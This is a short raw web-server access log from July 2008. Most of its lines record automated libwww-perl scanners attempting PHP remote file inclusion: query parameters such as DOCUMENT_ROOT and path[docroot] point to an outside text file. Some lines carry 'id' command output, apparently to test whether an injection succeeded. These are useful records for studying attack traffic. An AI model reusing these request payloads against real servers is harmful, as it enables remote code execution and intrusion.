85.239.113.1 - - [30/Jul/2008:23:21:12 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:21:12 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:21:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:21:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
65.55.208.138 - - [30/Jul/2008:23:23:07 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.12.119.178 - - [30/Jul/2008:23:24:02 -0500] "GET /logs/access_log.1214438400//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
81.169.186.162 - - [30/Jul/2008:23:24:11 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.larisco.com/id.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:24:11 -0500] "GET //?path%5Bdocroot%5D=http://www.larisco.com/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
83.12.119.178 - - [30/Jul/2008:23:24:11 -0500] "GET //atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
